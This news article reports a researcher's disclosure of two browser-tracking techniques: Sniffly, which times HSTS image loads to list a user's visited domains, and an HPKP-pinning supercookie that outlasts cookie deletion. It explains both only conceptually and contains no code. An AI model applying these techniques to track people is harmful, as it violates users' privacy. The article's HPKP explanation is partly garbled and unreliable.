A researcher demonstrated two unpatched flaws that can be exploited to track Millions of Internet users, allowing malicious website owners:
- List Building: To compile a list of visited domains by users, even if they have cleared their browsing history
- Tracking Cookies: To tag users with a tracking cookie that will persist even after they have deleted all cookies
These two Browser Fingerprinting techniques abuse HTTP Strict Transport Security (HSTS) and Content Security Policy – new security features already built into Mozilla Firefox and Google Chrome, and expected to make their ways to other mainstream browsers in near future.
WHAT IF, The Website owners turn these Security features against You?
A security researcher has proved exactly the same last weekend at Toorcon security conference in San Diego.
Yan Zhu, an independent security researcher, demonstrated how websites can abuse HSTS protections and Content Security Policy to track even the most paranoid user, allowing a website to sniff a user’s previously visited domains.
Yes, despite its obvious relation with 'Strictness' and 'Security', HTTP Strict Transport Security (HSTS) can be abused to keep track of you whenever you visit a website, even though it claims to keep your communication with that site more secure.
Hard to Believe?
Visit this web page http://zyan.scripts.mit.edu/sniffly/ yourself in Chrome, Firefox, or Opera and you will probably end up with an accurate list of websites you have and have not visited.
How Does Sniffly Work?
The exploit attempts to embed non-existent images from various HSTS-protected domains over HTTP.
If you have visited the HSTS website before, it will connect within few milliseconds. But, if it takes longer to connect, there's a chance that you have never visited the HSTS website before.
This browser fingerprinting technique is a simple method to sniff a quick list of which secure sites a user has and hasn't visited.
Zhu has developed this proof-of-concept attack site, which she has dubbed Sniffly, to showcase her attack, and also posted its source code on GitHub. You can also watch the video of her presentation below.
Certificate Pinning Tracks You even after Deleting Cookies
Besides tracking browser history, Zhu also demonstrated how a website can track Google Chrome users even if they delete all cookies after every visit.
Instead of exploiting HSTS, the 'Supercookie' technique abuses weaknesses in HTTP public key pinning (HPKP), also known as Certificate Pinning.
HPKP is a security measure designed to protect users against certificate forgeries by allowing websites to specify which certificate authorities have issued valid certs for their websites, rather than accepting any one of the hundreds of built-in root certificates.
Sniffly can abuse the standard by pinning text that is unique to each visitor, thereby reading the text on subsequent visits and using the unique text it would use a browser cookie to track the site habits of a user.
However, unlike a browser cookie, the certificate pin will remain intact even after the cookies are deleted.
The fingerprint-sniffing attack developed by the researcher, for instance, records only the domain and subdomains, instead of full URLs. Also, it only tracks visits to HSTS-protected sites for now.
Moreover, the results aren't accurate for people using the HTTPS Everywhere browser plugin, however, such shortcomings can likely be overcome with code modifications and refinements in the future.
For in-depth details, you can head on to the PDF slides.